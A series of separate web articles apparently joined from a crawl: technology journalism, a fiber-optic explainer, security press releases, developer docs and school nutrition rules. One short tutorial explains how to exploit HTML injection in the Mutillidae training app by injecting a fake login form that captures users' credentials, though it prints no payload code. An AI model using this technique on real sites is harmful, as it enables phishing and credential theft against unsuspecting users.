Vista, a projector and some cameras - packaged inside a table. What's impressive is how Microsoft organized these ordinary elements into something extraordinary. "Surface uses a series of cameras underneath the tabletop to see objects," said Kyle Warnick, group marketing manager for Microsoft Surface. "Hand gestures and touch - these user inputs are then processed with a standard Vista PC inside, and using rear projection, the input is displayed on the surface of the device." The cool part happens when the inputs are displayed. Surface completely changes the way a user interacts with a computer because it can recognize more than four-dozen simultaneous, unique touches. At the 2008 Consumer Electronics Show (CES) in Las Vegas, Microsoft, known more for force-feeding products down consumers' throats than beauty and innovation, showcased the elegance of Surface. Transferring digital photos from a camera to computer, for example, becomes as easy as dragging your finger across the surface. Photo editing is equally simple: Want the photo larger? "Grab" the corners and pull. Music files work the same way. If you have a Zune digital music player, you can organize your music as easily as CDs. But Surface is more than just an elaborate media center. The apparent limitlessness of applications is a pleasure to imagine. Microsoft initially hopes to deploy the technology in hospitality and leisure spaces; hotels and restaurants are likely candidates. As shown in Microsoft's CES demonstration, diners could eat their meals on the Surface tabletop, and along the way, the PC would recognize the specially tagged dishware and inform customers about the origins of their food and wine. Afterward, the bill would be paid on Surface by simply placing a credit card on-screen. "Right now we're focusing with our current partners - T-Mobile, Harrah's, Starwood, IGT - in the retail, leisure and entertainment industries," Warnick said. 
"Since announcing Surface, we've received more than 2,000 inquiries from 50 countries around the world across 25 different industries. The possibilities are endless, and we believe that over time, surface computing will be pervasive in many industries and even the public sector." How the public sector would utilize Surface remains to be seen. However, it's easy to imagine Surface in DMVs or social services offices, where customers might handle transactions through the touch interface. Other applications might be GIS-related or even, heretofore unimagined document management software. Cloud Computing: Is Software the New Hardware? Surface is all about making the user computer experience more personal and tangible. Cloud computing, on the other hand, seeks to do the opposite by taking what we do further into the digital ether. You've probably heard all the terms - grid computing, distributed computing, utility computing, cluster computing and on-demand computing. Although they don't mean the same thing, fundamentally the terms describe something similar: the concept of using another entity's infrastructure to enhance your own capability. In June 2005, Government Technology published a story on utility and grid computing titled Witnessing an Evolution. The grid is a theoretical network of devices, most of which use only a fraction of their computing power at any time. The idea - that's often practiced many times - is to concentrate that excess processing power and focus it on a large problem. Put another way, a major problem is "distributed" across a network of capacity. Stanford University's Folding@home project is one of the finest examples of distributed computing. Windows PC, Linux and Mac users, as well as Sony PlayStation 3 owners, can participate in the initiative by leaving their Internet-connected machines on standby mode when unused. Folding@home co-ops the machines' collective computing muscle to help solve the genetic riddles that plague efforts to cure diseases. Utility computing is similar in some ways and dissimilar in others. In the utility computing model, rather than randomly dispersed machines working on a single problem, randomly dispersed people access computer farms to solve their own problems. It's called utility computing because it operates like an everyday utility, such as electricity, gas, water, etc. Regardless of the exact strategy or definition in play, it all comes down to the cloud concept, which is the transformation of infrastructure to software. The machines themselves become less about performing a task and more about accessing computational power. If there was ever a philosophical goal underlying the creation of the Internet, cloud computing may be it - an infinite number of machines using an infinite number of resources to perform a task. As the Information Age rushes onward, more data is continually created. IT professionals in the public sector routinely confront the challenges associated with maintaining this data onslaught. What if, instead of routinely investing in new infrastructure, an agency could instead access a global cloud of machines to process data? Google and other industry heavyweights are already preparing for the cloud-computing era. Like Microsoft and IBM, Google has tens of thousands of machines that sit around the world. Accessing these machines unused computing power these machines would be like tapping into an enormous supercomputer capable of crunching the biggest numbers. 
Christophe Bisciglia, a Google software engineer, recently launched the Academic Cluster Computing Initiative. Through a partnership with IBM and the National Science Foundation, Bisciglia connects universities worldwide to Google's cloud, and along the way teaches students to think and program on a massive scale. "We started with the University of Washington, and we brought in a cluster of 40 machines, and we taught the first cluster-computing course for undergraduates," Bisciglia explained. "We used an open-source software system called Hadoop. It's an open-source distributed computing platform inspired by Google's published computing technology. It's a software system that gives you the ability to turn a cluster of hardware into a dynamic software system that allows you to manage and process large amounts of data." What's the use of clusters? As Bisciglia explained, organizations are being inundated with more and more data. Single machines become incapable of processing these vast amounts of information and eventually will fail. Buying more machines becomes unfeasible - particularly for public-sector organizations limited by budgets. "Networks are getting faster and faster. Two computers connected to each other via network are much more like a dual processor machine than they were five years ago," said Bisciglia. "So basically you need to scale out horizontally now. When you want more computational power, you can't just wait for computers to get faster; you can't just buy a faster processor. You need to add more computers in a network's configuration and interact with another cluster, rather than as a single machine." Cloud computing isn't as far off as it might initially seem. In fact, it's already happening in some respects, but it goes by yet another name: software as a service (SaaS). SaaS has been around in one form (application service provider, or ASP) or another for a while. It functions via the same principles as cloud computing. Instead of users investing in more computing infrastructure to complete tasks, they can instead access someone else's cloud to do the work. Salesforce.com has been a leader in the SaaS industry for years by hosting customer relationship management (CRM) solutions for organizations that can't or won't invest in the infrastructure to do it themselves. The company is now heavily involved in applications that extend beyond CRM, opening its cloud to anyone who wants access. Salesforce.com also offers users a platform service that lets them create their own unique applications in the cloud - and users can keep the applications for themselves or share them with others. "Platform user service really allows customers to have computing power delivered completely as a utility in the cloud," said Dan Burton, senior vice president of global public policy for Salesforce.com, "so customers can then use the cloud computing architecture to build, test, deploy and run applications in the cloud. What that really means for customers and developers is, instead of going to a preconfigured application, they can really go into the cloud, and using our programming language, APEX, they can custom build any application they want to." It may not be the stuff that cloud computing dreams are made of, but it represents the inroads that are being made into cloud computing, which are available to an IT crowd desperate to produce more with less. One obstacle to life in the clouds is security. 
Public-sector organizations trade heavily in sensitive data; the thought of letting that data loose in some ethereal cluster of random machines is likely to send shivers up CIOs' spines. It makes sense that early cloud activity takes place in an environment mediated by a large, established company like Salesforce.com, which is why several public-sector organizations are already taking their first steps into the cloud using Salesforce.com's tools. Mike Goodrich, the director of administration at Arlington Economic Development (AED) in Virginia, said his foray into the cloud isn't about grand ideas of having a virtual supercomputer to do his bidding. Rather, it allows his agency to do business better. AED creates economic opportunities for Arlington; generally this is accomplished by attracting tourists and businesses to the city. By putting some of its processes, such as event registration, into Salesforce's cloud, it frees IT staff to concentrate on providing better service instead of maintaining equipment. "Our IT staff has not had to invest their time, effort and money into maintaining servers," he said. "They've been able to simply know Salesforce is maintaining our data. So there's very little involvement from our infrastructure support. It's not really money saved. What it does is improve our business." It's not just Salesforce.com and Google that are investing in clouds. Amazon offers its Web Services to small businesses that need some IT muscle but can't afford to put it in-house. Amazon customers basically can run any or all of their business processes on the retailer's array of servers, using only the processing power that's needed to do the job. Nicholas Carr, former executive editor of the Harvard Business Review; author of The Big Switch; and recent keynote speaker at Government Technology's California CIO Academy in Sacramento, Calif., likens cloud computing to Alan Turing's theoretical "universal computing machine." "With enough memory and enough speed, Turing's work implies a single computer could be programmed, with software code, to do all the work that is today done by all the other physical computers in the world," Carr wrote in IT in 2018: From Turing's Machine to the Computing Cloud. "Turing's discovery that 'software can always be substituted for hardware' lies at the heart of 'virtualization,' which is the technology underpinning the great consolidation wave now reshaping big-company IT." From running day-to-day processes on far-flung corporate machines, to a global network of load-sharing clusters, the network is becoming the computer - and the clouds are on the horizon. Robotics: Nerds' Revenge? The booming nanotechnology industry is paving the way for advances in fields as diverse as cancer research and space exploration. The big science of creating such tiny things also exposes a glaring problem for industry, including the public sector: the severe shortage of new workers trained and skilled in math, science and engineering. Fortunately there is a ray of hope in the form of something else nanotechnology is revolutionizing - robots. There is plenty of conjecture about what robots will be like in five or 10 years. You can find plenty of guesses - educated and wild - about what capabilities robots will possess. What's underreported is another purpose of robots that they weren't designed for. 
"Because of our shortage of people entering into engineering, we've got a crisis in this country," warned Glenn Allen, professor of mechatronics engineering at Southern Polytechnic State University. "The importance of getting and recruiting our future researchers - that's where we're going to fall short." It's a familiar problem. What are organizations going to do when their knowledge base retires? Furthermore, how can businesses and government encourage the Millennial Generation to pursue careers in science and engineering, especially when all the evidence points to stagnating interest in scientific studies? The answer may be robotics. Allen is the director of the Georgia BEST Robotics program. BEST (Boosting Engineering, Science, and Technology) and FIRST (For Inspiration and Recognition of Science and Technology) are two programs designed to foster student and community interest in engineering careers. The programs hold regional competitions nationwide that bring together teams of students from all grade levels, challenging them to build robots that perform specific tasks. The goal is to move robotics away from a geeky subculture to something more akin to the local high-school football team - a lofty goal. "In middle schools and high schools, as students start getting exposed to math and the sciences, they don't see the application, and they get bored with it and don't engage," Allen said. "When the kids get involved in these robotics competitions, they realize that if they want to continue to pursue this - stuff they love, stuff that's fun, and they want to make a career out of it ... they realize math and science do have applications." It's long been known that kids love math and science - to a point. Somewhere around the 11th grade, there is a precipitous decline in the number of students participating in technical pursuits. The numbers are a bad omen for companies and organizations looking for the future work force. Allen said that despite technology's massive expansion, the number of graduates with science and engineering degrees hasn't changed significantly since the 1970s. Randy Schaeffer, regional director of New York/New Jersey FIRST, argues that a big part of the problem is the culture, as anyone familiar with IT projects can relate. "On any fall afternoon, you don't have to go too far to find 22 kids out on a big, grassy field with hundreds and hundreds of community members, cheerleaders, pep bands, coaches and a lot of hoopla," said Schaeffer. "The local papers devote pages and pages to what those kids are doing. As a result, they come away with the feeling that what they're doing is pretty cool and pretty important." Allen echoed the same concern. Students need to be motivated as if they are star athletes to stay with these pursuits, as do those who volunteer their time to help mentor students in science and engineering. "Think about football games," he said. "The coach, he gets paid to be there after school coaching those students in athletics. The robotics coaches that I know of in Georgia do it out of devotion. These guys are working every evening; they're working weekends - zero compensation in most cases. Think about the booster club for the football team, basketball team and soccer team. Where is the booster club [for areas like robotics], and where are the parents? There's not a mechanism to give these coaches the resources they need. We need to make robotics a lettering sport. We need to make it culturally acceptable." The BEST and FIRST programs are making headway. 
The regional FIRST competition made the front page of several California newspapers. The numbers show progress too: Kids involved in FIRST and BEST are more likely than their peers to attend college. They're more likely to attain a post-graduate degree and major in science or engineering. Changing the culturally accepted notion that athletes are cool and kids who like science are not isn't going to be easy. The roots of these perceptions reach into many facets of life. But there are signs of a shift. Pay attention to social networking sites and Web forums - the "nerdier" among us often rule the roost online. The onus to embrace math, science and engineering is as much on the community as it is on children. Hopefully it isn't too little, too late. Regardless, people like Allen and Schaeffer are doing what they can to make geek chic. And you thought all robots did was vacuum.
<urn:uuid:70cd1f2c-63de-45cb-8a74-3a05294bdf09>
CC-MAIN-2017-09
http://www.govtech.com/policy-management/102471704.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00421-ip-10-171-10-108.ec2.internal.warc.gz
en
0.954272
3,631
2.578125
3
The 2012 observance of the International Day of Commemoration in memory of the victims of the Holocaust will focus on the theme “Children and the Holocaust”. The United Nations will remember the one-and-a-half million Jewish children who perished in the Holocaust, together with the thousands of Roma and Sinti children, the disabled and others, who suffered and died at the hands of the Nazis and their collaborators. Some children managed to survive in hiding, others fled to safe havens before it was too late, while many others suffered medical experiments or were sent to the gas chambers immediately upon arriving at the death camps. Highlighting the impact of mass violence on children, this theme has important implications for the 21st century. (United Nations Official Site) Visit “The Holocaust and the United Nations Outreach Programme” here: http://www.un.org/en/holocaustremembrance/2012/calendar2012.html. While the “International Day of Commemoration in Memory of the Victims of the Holocaust” itself falls on January 27, 2012, related events begin running today.
<urn:uuid:ebaf4bdc-b78a-4e44-9324-2cee5cb3ee00>
CC-MAIN-2017-09
https://www.nerdsonsite.com/community-involvement/?p=191?shared=email&msg=fail
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00117-ip-10-171-10-108.ec2.internal.warc.gz
en
0.946074
227
3.640625
4
FTTH (Fiber To The Home), as its name suggests, is optical fiber run directly to the home. Specifically, FTTH refers to installing the optical network unit (ONU) at the premises of home or business users; apart from FTTD (fiber to the desktop), it is the optical access application type that reaches closest to the user. There are 5 main advantages of FTTH: First, it is a passive network, so everything between the central office and the user can be essentially passive; Second, the bandwidth is relatively wide and the long reach suits large-scale deployment by operators; Third, because services are carried entirely over fiber, electrical interference is not a problem; Fourth, because of its relatively wide bandwidth, the supported protocols are more flexible; Fifth, as the technology develops, FTTH systems, including point-to-point and 1.25G designs, have become functionally mature. Indoor optical cable is classified by its usage environment, as opposed to outdoor fiber optic cable. Indoor optical cable is built up from optical fiber (the optical transmission medium) through further processing and consists mainly of the optical fiber (glass fiber as thin as a hair), a plastic protective tube and a plastic sheath. Because it contains no gold, silver, copper, aluminum or other metals, fiber optic cable generally has no recycling value. An indoor fiber optic cable is a number of optical fibers formed into a cable core in a particular way, surrounded by a jacket and sometimes an additional protective layer, to create a communication line for optical signal transmission. Indoor cable has lower tensile strength and a thinner protective layer, but it is more convenient to handle and cheaper. Indoor cable is mainly used for building wiring and connections between network devices. Outdoor fiber optic cable is used in outdoor environments, the opposite of indoor cable. Outdoor cable is likewise a communication line for optical signal transmission, composed of a number of optical fibers formed into a cable core, surrounded by a jacket and often an additional outer protective layer. Outdoor cable mainly consists of optical fiber (glass fiber as thin as a hair), a plastic protection tube and a plastic sheath; containing no metals, it generally has no recycling value either. Outdoor cable has greater tensile strength, a thicker protective layer, and is usually armored (wrapped in metal). Outdoor cables are mainly used between buildings and for interconnecting remote networks. A fiber optic patch cable, also known as a fiber jumper, is used to connect equipment to the fiber optic cabling link. A fiber jumper has a thick protective layer and is generally used to connect a fiber converter to a fiber termination box. Commonly used fiber jumper connectors include ST, LC, FC and SC. Single-mode fiber patch cable: single-mode jumpers are generally yellow, with blue connectors and protective sleeves, and support long transmission distances. Multi-mode fiber patch cable: multimode jumpers are generally orange (some are gray), with beige or black connectors and protective sleeves, and support shorter transmission distances.
<urn:uuid:c76d41c8-9f25-4631-9c29-944d7022d747>
CC-MAIN-2017-09
http://www.fs.com/blog/several-common-types-of-fiber-optic-cables-and-patch-cables.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00061-ip-10-171-10-108.ec2.internal.warc.gz
en
0.934755
647
3.109375
3
The U.S. Department of Health and Human Services today released several online tools to help health-care providers use mobile devices such as smartphones, tablet computers and laptops without risking breaches of patient health information. The tools are part of an HHS education initiative to help providers and other health-care organizations better secure protected health information on mobile devices. The multipronged initiative also includes a variety of videos, fact sheets, FAQs and posters. In a recent Ponemon Institute survey on patient privacy and data security, 94 percent of health-care organizations reported a data breach in the past two years. The most common security breach was the loss of equipment, primarily mobile devices, reported by 46 percent of respondents. Larry Ponemon, chairman of the institute, based in Portland, Ore., said many of the breaches can be traced to the use of cloud computing services and the rapid growth of workers using their own mobile devices in the workplace. “Many organizations admit they are not confident they can make certain these devices are secure and that patient data in the cloud is properly protected,” Ponemon said in a statement. “Overall, most organizations surveyed say they have insufficient resources to prevent and detect data breaches." The HHS education initiative grew out of a Mobile Device Roundtable held in March. The mobile device security initiative was formally launched today at the annual meeting of the Office of the National Coordinator for Health IT, a division of HHS.
Most of the talk about big data in government has been about crunching through existing data pools to spot trends that older tools weren't powerful enough to identify. Computer scientists are crawling the full database of Medicare claims, for example, to spot common fraud patterns before those claims are paid out. IBM's Smarter Cities project is analyzing existing data from traffic sensors to build plans to ease congestion and reduce pollution.

The potential insights offered by deeper computer analysis have also prompted some agencies to begin new data gathering projects, though. Witness this special notice from the Centers for Disease Control and Prevention seeking a data coordinating center for information related to sudden death in people under 24 years old. According to the notice:

Sudden death in the young (SDY) is a tragedy that affects children and young adults of all ages, making it a critical public health concern. Development of effective screening and prevention strategies is currently limited by the lack of prospectively defined epidemiological data, including incidence rates of specific causes of death (e.g., sudden cardiac death, sudden unexplained death in epilepsy). To address this knowledge gap, the CDC and the National Institutes of Health (NIH) are developing a program to explore and provide greater understanding of SDY by developing a surveillance system and registry that will broaden and enhance the activities of CDC's Sudden Unexpected Infant Death (SUID) Case Registry. We expect many of the infant SDY cases to be a subset of the SUID cases.

The National Institutes of Health is cosponsoring the project.
Encourages Parents to Model Good Device and Online Safety Behavior in 2012 SANTA CLARA, Calif. January 4, 2012 — With more devices in everyone’s hands after the holidays, children are sure to take their cues from parents and older siblings. Ultimately children will become frequent users of online devices — playing games, watching videos, texting, listening to music, web surfing, etc. — just like their other family members — and they’ll imitate the behaviors they see at home. McAfee, provider of the award-winning web filtering McAfee® Safe Eyes® software, suggests that, this year, parents take time to teach healthy online habits. “What child doesn’t want to be just like Mom, Dad or an older sibling? Kids today see Mom spending lots of time on social networking sites, Dad taking calls or checks email during the dinner hour and older siblings texting friends and listening to music on their cell phones while doing homework,” says Stanley Holditch, online family safety advocate at McAfee. “Now is the time for parents to model good behavior and etiquette.” McAfee recommends parents start the New Year off fresh with resolutions that address their own behavior so they can model best practices for kids and teens: 1. When I’m with my children, I pledge not to spend more than 10 percent of the time on my phone or computer. Adults spend about 3.5 hours a day perusing the Internet or staring at their cell phone, according to estimates from eMarketer.1 This year, make a promise to give your full attention to your children and develop a plan to limit their use of electronic devices. For example, make rules against using cell phones during dinner and set a time that everyone turns their devices off. A Kaiser Family Foundation study1 found that eight to 18-year-olds average over 7.5 hours per day to using entertainment media including cell phones and computers. Some of that time is spent multitasking, including doing homework. The study also found that only three in ten young people have rules about how much time they can spend watching television, playing video games or using the computer. 2. I will not communicate with my children via text when they are in the house. One downside of technology is that fewer people actually speak to one another. The Kaiser study found that children in grades 7-12 spend an average 1.5 hours a day sending or receiving texts. A recent Nielsen study revealed that, on average, teenagers send more than 3,300 texts each month (girls send about 4,000 texts a month).2 Adults are texting more frequently, too, but haven’t quite caught up with the younger generation. The Pew Research Center found that adults send only about 10 texts per day.3 3. I will not give my child access to an Internet browser on a smartphone or tablet that is not safe for them to use. At age three, about one-quarter of children go online daily, and that number increases to about half by age five. By age eight, more than two-thirds use the Internet on any given weekday.4 In addition, 20 percent of children age 6-11 own cell phones with Internet capabilities, according to reports from Mediamark Research and Intelligence.5 It’s important for parents to shield children from cyber-dangers by filtering explicit content on smartphones and tablets via applications such as Safe Eyes Mobile software. The software can prevent children from establishing or accessing social network accounts, limit Internet use, block inappropriate websites or messenger chats, or use other strategies to ensure youngsters are safe online. 4. 
I will be prepared to have a "texting intervention" if my teen's thumbs begin to look like tiny body-builders. Texting may be a quick and easy way to interact with others, but the impersonal nature of the communication and frequency of use can cause problems. Too much texting can lead to a variety of issues: poor study and sleeping habits, less face-to-face social interaction, and, for older teens, distracted driving. Discuss appropriate behavior before problems arise and set boundaries. Most mobile device providers have ways to monitor and limit the number of text and picture messages youngsters can send and receive. 5. I will have “the” talk with my kids. Not “that” talk, but rather the one that discusses who they are connecting with and what they are doing online. Children often lack an understanding of online dangers or they may lack the maturity to make appropriate decisions. A recent survey found that 96 percent of parents have offered guidance to their children about online behavior and the risks and benefits of being on the Internet.6 Children learn how to use technology, including how much and when, by watching their parents, so it's important that parents model good behavior. They also look to their parents for guidance and protection when they are online. In addition to education, there are mobile solutions available for parents and kids to help keep them safe, such as McAfee Safe Eyes Mobile software, which provides a filtered browser for iOS devices, as well as McAfee Family Protection for Android. By modeling good behavior and ensuring that children’s experiences on Internet-connected devices is a safe and healthy one, parents can ensure a 2012 that is free of digital drama. 1eMarketer Digital Intelligence, Time Spent Watching TV Still Tops Internet, December 2010 2Kaiser Family Foundation, Generation M2: Media in the Lives of 8- to 18-Year-Olds, January 2010 3Nielsen, U.S. Teen Mobile Report: Calling Yesterday, Texting Today, Using Apps Tomorrow, October 2010 4Pew Research Center, Cell Phones and American Adults: They Make Just as Many Calls, but Text Less Often than Teens, September 2010 4Joan Ganz Cooney Center, Always Connected: The New Digital Media Habits of Young Children, March 2011 5Mediamark Research and Intelligence, American Kids Study, 2009 6Family Online Safety Institute/Hart Research, Who Needs Parental Controls: A Survey of Awareness, Attitudes, and Use of Online Parental Controls, September 2011 McAfee, a wholly owned subsidiary of Intel Corporation (NASDAQ:INTC), is the world's largest dedicated security technology company. McAfee delivers proactive and proven solutions and services that help secure systems, networks, and mobile devices around the world, allowing users to safely connect to the Internet, browse and shop the Web more securely. Backed by its unrivaled Global Threat Intelligence, McAfee creates innovative products that empower home users, businesses, the public sector and service providers by enabling them to prove compliance with regulations, protect data, prevent disruptions, identify vulnerabilities, and continuously monitor and improve their security. McAfee is relentlessly focused on constantly finding new ways to keep our customers safe. http://www.mcafee.com NOTE: McAfee and Safe Eyes are registered trademarks or trademarks of McAfee or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others.
HTML injection is a web application vulnerability that allows users to insert HTML code through a specific parameter or entry point. Combined with social engineering, it can be used to trick legitimate users of the application into opening malicious websites or entering their credentials into a fake login form that redirects them to a page that captures cookies and credentials. In this tutorial we look at how to exploit this vulnerability effectively once it has been discovered. Mutillidae is used as the vulnerable application.

Suppose the application contains a page whose form accepts HTML tags; in this example the acceptance of HTML is an intended part of the application's functionality. A malicious attacker who has set up a page on his own server to capture cookies and credentials can exploit the application's users: he tricks them into entering their credentials by injecting a fake HTML login form into the vulnerable page. Mutillidae already includes a data-capture page, so that page is used for this tutorial.

HTML code can now be injected that causes the application to render a fake login form. Every user who enters credentials into that form is redirected to another page where the credentials are stored; in this case they can be found on Mutillidae's data-capture page.

As this article shows, HTML injection vulnerabilities are very easy to exploit and can have a large impact, because any user of the web application can be a target. System administrators must take appropriate measures to protect their web applications against this type of attack.
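The article's screenshots are not available here, so the following is a minimal sketch, assuming a hypothetical Mutillidae-style page and parameter name, of how an injected fake login form might be delivered and checked for programmatically. The URL, parameter name and capture address are illustrative, not values taken from the article, and this should only be run against systems you are authorized to test.

```python
# Illustrative only: run this solely against systems you own or are authorized to test.
import requests

# Hypothetical addresses and parameter name; the article does not specify these values.
VULNERABLE_PAGE = "http://victim.example/mutillidae/add-to-your-blog.php"
CAPTURE_PAGE = "http://attacker.example/capture-data.php"

# A fake login form submitted as ordinary form input. If the application echoes
# the input back without encoding it, browsers will render it as a real form.
payload = f"""
<div>Your session has expired. Please sign in again.</div>
<form action="{CAPTURE_PAGE}" method="POST">
  Username: <input type="text" name="username"><br>
  Password: <input type="password" name="password"><br>
  <input type="submit" value="Login">
</form>
"""

# Submit the payload through the (assumed) vulnerable parameter.
resp = requests.post(VULNERABLE_PAGE, data={"blog_entry": payload})

# If the raw markup comes back unescaped, the page is rendering attacker-supplied HTML.
marker = f'<form action="{CAPTURE_PAGE}"'
if marker in resp.text:
    print("Payload reflected unencoded: the page appears vulnerable to HTML injection.")
else:
    print("Payload appears to be encoded or filtered.")
```

In a real Mutillidae exercise the payload is simply typed into the vulnerable form in a browser, as the article describes; the script above only automates checking whether the markup is reflected without encoding.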
Many apps that you create will need to manipulate data in some way. A contacts list app might need to load existing contacts from a data file and save new contacts in the file. A sports app might track team statistics in a data file and update these statistics after each game. The BlackBerry 10 Native SDK supports a wide range of libraries that you can use to manipulate data, like SQLite, JSON_parser, and libxml2. Cascades also provides its own set of data management APIs to help remove some of the complexity of storing and modeling data.

Cascades provides its own set of APIs that you can use to parse and store JSON data. For SQL data, the SQLite library provides a serverless, transactional SQL database engine that you can include in your apps. To remove some of the complexity of creating a SQLite database, you can use the Cascades APIs. To learn more about using SQL in Cascades, see SQL data. As with the other types of data mentioned above, Cascades provides its own set of APIs to make managing XML data easier. For more information about managing XML data with Cascades, see XML data.

File system access

Before you can store or retrieve data from the device, you should first make yourself familiar with the architecture of the device file system. Applications have access to their own working directories as well as a shared directory that all apps can access. For more information about the file system, see File system access.

Cascades data management APIs

The Cascades framework uses a modular approach to store, access, and display data in your apps. This approach makes it easy for you to store different types of data, organize and model the data in different ways, and display the data with different visual styles. The following components interact when you manipulate data in your app.

Data: This component represents the raw data for your app. The data could be a list of contact entries, a set of financial records, or a group of game objects. You can access data that you package with your app, but you can also create new data dynamically as your app runs. The format of this data can vary depending on your needs, and Cascades provides classes that help you manage three common data formats: JSON, SQL, and XML.

Data access: This component lets you access the external data and manipulate it in your app. You can load data files, create new files and save data in them, and handle any errors that might occur during these operations. Then, you can add the data to a data model to organize it before it's displayed. You can use the JsonDataAccess, SqlDataAccess, and XmlDataAccess classes to load and save data in JSON, SQL, and XML format, respectively. You can also access SQL data asynchronously using an SqlConnection. Supporting classes, such as DataAccessError, give you more information about errors so you can handle them appropriately.

Data source: This component is designed specifically as an easy-to-use adapter in QML between external data and UI components. You can use the DataSource class to declare the properties of the external data that you want to access. This data can be SQL, JSON, or XML data that's stored locally, or it can be JSON or XML data feeds that are accessed remotely. You can also use the DataSource class to control when and where the data is loaded.

Data model: This component lets you organize and sort your data, and then provide the data to a list view to display it. For example, you can use a GroupDataModel to sort a list of employees by last name or employee number. Then, you can associate this data model with a list view, and your data is organized and displayed in the way you specified. To learn more about data models, see Data models.

List view: This component determines how the data from the data model is displayed in your app. Each entry in the data model becomes an item in the list, and you can specify how each item should appear visually. You might represent each item using a simple Label, or you might represent each item using multiple controls that you define yourself. A ListView lets you handle all visual aspects of the list, and is separate from the data and the data model that's used to provide the data to display. To learn more about list views, see Lists.

Large data sets

If you're using a ListView to display information from a data source, you must consider how the performance of your app is affected by the amount of data. Small amounts of data can be loaded as a complete set during initialization with little to no performance impact. Large sets of data must be managed differently to avoid start-up delays, slow scrolling, and other indicators of poor performance. For more information about managing large amounts of data, see Large data sets.

Persistent data allows you to save app settings to the persistent store and load them when they are needed. The persistent store lets you save objects to persistent memory, and these objects are retained in memory after a device is restarted. For more information about the persistent store, see Persistent data.

Last modified: 2015-07-24
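Cascades is a C++/QML framework, so the classes above (JsonDataAccess, GroupDataModel, ListView) are not Python APIs; the sketch below only illustrates the same separation of data access, data model, and view in plain Python, with an invented contacts.json file and invented field names.

```python
import json
from collections import defaultdict
from pathlib import Path

# --- Data access: load the raw records (analogous to loading with JsonDataAccess) ---
def load_contacts(path):
    return json.loads(Path(path).read_text())

# --- Data model: group and sort (analogous to a GroupDataModel keyed on lastName) ---
def build_model(records, key="lastName"):
    groups = defaultdict(list)
    for rec in records:
        groups[rec[key][0].upper()].append(rec)   # group under first letter of the key
    return {letter: sorted(items, key=lambda r: r[key])
            for letter, items in sorted(groups.items())}

# --- View: render each item (analogous to a ListView's per-item visuals) ---
def render(model):
    for letter, items in model.items():
        print(letter)
        for rec in items:
            print(f"  {rec['lastName']}, {rec['firstName']}")

if __name__ == "__main__":
    render(build_model(load_contacts("contacts.json")))
```

In an actual Cascades app the grouping and display steps are handled declaratively by attaching a GroupDataModel to a ListView, as the documentation above describes.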
Teaching Smart Social Networking You’ve got a 10-minute break between classes. What do you do? Grab a snack, hit up office hours, maybe log on to Facebook and scan your friends’ profiles for the latest gossip? All are viable options, unless you’re a student at Concordia University in Montreal. Since September, Concordia University has banned the use of Facebook on all on-campus terminals, including desktop computers. According to published reports, the ban was implemented after Concordia officials noticed an increase in spam and phishing attacks that technical experts traced to social networking sites, particularly Facebook. “Social networking was a new playground for spammers,” explained David Poellhuber, president of Zerospam, a provider of professional e-mail filtering services. “It offered them a fresh crop of targets — mostly young people, tech-savvy people [who are] perhaps not so security-conscious.” In fact, users who have grown up with computers are prime targets for social networking attacks because they’re inherently hungry for content and used to clicking around online to obtain it, Poellhuber said. “They want to get the features, they want to get the application, and they will click ‘yes,’” he said. “They will click ‘yes’ to Google, which will read their e-mail. They will click ‘yes’ to any Apple store, which will hold their credit card information. They just want to get [the programs] running. The fact is that the digital natives are probably more lax than the analog natives on privacy protection.” Simply posting your e-mail address online opens you up to hacker attacks, Poellhuber said. “Doing that not only is an invitation to spammers, but it also compromises the internal e-mail syntax structure. An educated spammer could, in fact, deduce what your e-mail syntax is [and send spam to] not only you but also your whole company,” he said. Hackers and spammers do need to work harder to obtain personal data via social networking sites, but the payoff is worth the work. “They have to use fake invites, they have to create fake profiles — they even have to use phishing techniques to get the user credentials and then actually take over the compromised accounts,” Poellhuber said. “But in the end, the reward is quite good because, since social networking is based on trust, they might very well have a larger response rate than they have with the traditional techniques.” That means if a hacker spams the entire populations of Facebook and MySpace combined — roughly 170 million people — and achieves one click in 10,000 or even one in 20,000, it’s still a good business. “It’s the law of large numbers,” Poellhuber said. Despite the risks of social networking on campus, however, Poellhuber said restricting access is not the best option. “Blocking social networking sites is the best way to create a riot,” he joked. So what can students and universities do to ensure everyone enjoys a safe social networking experience? “The answer lies far more in education than anything else,” Poellhuber said. “A lot of this has to do with helping the users behave properly.” As a student, you should be aware of the security features available on sites such as Facebook. For example, you can change your privacy settings to limit the visibility of your online profiles to approved members. Additionally, you should try to avoid publishing your e-mail address. Also, keep in mind that the larger your network of virtual “friends,” the greater your risk of being spammed. 
“How much trust can you put into a 700-people network? As it grows larger, I think the trust goes lower,” Poellhuber said. Poellhuber also recommended students be extra vigilant when logging on to social networking sites “just to make sure they’re on the right site and not a phish site.” Educational institutions should be broadcasting these guidelines as effectively as possible, but the IT community also holds responsibility. – Agatha Gilmore
School Nutrition Standards

School meals are healthy meals that are required to meet the Dietary Guidelines for Americans. To receive federal reimbursements, school meal programs must offer "reimbursable" meals that meet strict federal nutrition standards. These standards, also referred to as "the meal pattern," require schools to offer students the right balance of fruits, vegetables, low-fat or fat-free milk, whole grains and lean protein with every meal.

Updated School Meal Standards: The Healthy, Hunger-Free Kids Act of 2010 (HHFKA) required the U.S. Department of Agriculture (USDA) to update these nutrition standards for the first time in 15 years. The new regulations, effective beginning in 2012, require cafeterias to offer more fruit, vegetables and whole grains and limit sodium, calories and unhealthy fat in every school meal.

New Snack Standards: To ensure all foods and beverages sold in school during the school day are healthy choices, HHFKA also required USDA to create nutrition standards for foods and beverages sold in competition with reimbursable meals. These "competitive foods" are sold in vending machines, snack bars and a la carte lines. In June 2013, USDA issued the "Smart Snacks in School" interim final rule establishing these standards, which took effect July 1, 2014.
